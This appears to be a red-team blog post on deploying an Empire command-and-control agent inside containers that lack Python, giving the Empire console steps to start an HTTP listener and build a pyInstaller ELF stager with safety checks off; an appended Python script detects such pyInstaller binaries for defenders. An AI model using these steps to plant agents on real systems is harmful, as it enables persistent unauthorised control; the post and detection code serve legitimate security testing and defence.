Empire AKA Empyre inside Containers without Python

Containers are designed to run a single service, so a container usually contains only the software and dependencies that one service needs. This means that an attacker who gains RCE inside a container may still have limited options: their usual toolkit often relies on a dependency that the service hosted in the container does not need.

For example, many containers do not ship with Python pre-installed, so an attacker who expects Python to be on the remote target may be in for some disappointment. Empire 2.x beta (previously known as EmPyre) relies on Python 2.7 being present on Linux targets, so it is normally of little use in many containers, because they do not have Python installed by default.

To work around this issue, I developed a module that uses pyInstaller to bundle up the needed Python dependencies and build a standalone ELF binary. That binary can be moved onto a remote target that lacks Python 2.7 to get an interactive Empire agent on the remote target.

This module is fairly simple to use. For example, start Empire and then run:

(Empire)> listeners
(Empire: listeners)> uselistener http
(Empire: listeners/http)> execute
(Empire: listeners/http)> agents
(Empire: agents)> usestager multi/pyinstaller
(Empire: stager/multi/pyinstaller)> set Listener http
(Empire: stager/multi/pyinstaller)> set SafeChecks False
(Empire: stager/multi/pyinstaller)> execute

By default, this pyInstaller stager will create three files in /tmp:

  • emPyre -> a standalone ELF binary
  • emPyre.py -> the final Python code that was compiled into the ELF binary
  • emPyre.spec -> the spec file that pyInstaller used to create the ELF binary

These files are provided so that you can more easily customize your future pyInstaller ELF binaries for various exploitation scenarios.
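From the defender's side, the useful property of a pyInstaller-built ELF like /tmp/emPyre is that it is recognisable regardless of what Python code it carries: pyInstaller appends a CArchive "cookie" whose magic bytes (MEI\x0c\x0b\x0a\x0b\x0e) and trailer record the bundled Python version and libpython name. The following is an added triage example, not code from the original post or from the Empire project; the cookie layout is pyInstaller's own, while the sample binary is constructed in the script and the scan_directory helper is a hypothetical name for use on a host's /tmp.

```python
import os
import struct

# pyInstaller CArchive cookie: magic, package length, TOC offset, TOC length,
# Python version, libpython name. It trails the payload at the end of the bundle.
PYI_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
COOKIE_FMT = "!8sIIII64s"
COOKIE_LEN = struct.calcsize(COOKIE_FMT)  # 88 bytes

def decode_pyvers(pyvers: int) -> str:
    """pyInstaller stores major*10+minor (older) or major*100+minor (newer)."""
    major, minor = divmod(pyvers, 100) if pyvers >= 100 else divmod(pyvers, 10)
    return f"{major}.{minor}"

def inspect_binary(data: bytes) -> dict:
    """Report whether a file looks like an ELF and whether it carries a pyInstaller cookie."""
    info = {"is_elf": data[:4] == b"\x7fELF", "pyinstaller": False}
    idx = data.rfind(PYI_MAGIC)  # last occurrence: the real cookie trails the payload
    if idx == -1 or len(data) - idx < COOKIE_LEN:
        return info
    _, pkg_len, toc_off, toc_len, pyvers, pylib = struct.unpack_from(COOKIE_FMT, data, idx)
    info.update(pyinstaller=True, python_version=decode_pyvers(pyvers), package_len=pkg_len,
                toc_off=toc_off, toc_len=toc_len,
                pylib=pylib.rstrip(b"\x00").decode("ascii", "replace"))
    return info

def scan_directory(path: str) -> list:
    """Hypothetical helper: flag every regular file under `path` that carries a pyInstaller cookie."""
    hits = []
    for root, _, files in os.walk(path):
        for name in files:
            full = os.path.join(root, name)
            try:
                with open(full, "rb") as fh:
                    info = inspect_binary(fh.read())
            except OSError:
                continue  # unreadable or vanished file, skip it
            if info["pyinstaller"]:
                hits.append((full, info))
    return hits

def build_sample() -> bytes:
    """Constructed test input (not a real bundle): an ELF-looking stub plus a pyInstaller-style cookie."""
    stub = b"\x7fELF" + b"\x00" * 60 + b"BOOTLOADER" * 8
    cookie = struct.pack(COOKIE_FMT, PYI_MAGIC, 4096, 64, 256, 27, b"libpython2.7.so.1.0")
    return stub + b"\xaa" * 128 + cookie

if __name__ == "__main__":
    print(inspect_binary(build_sample()))
```

A bundled Python 2.7 binary sitting in /tmp of a container whose image ships no Python at all is the kind of mismatch this check is meant to surface.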

Bryce Kunz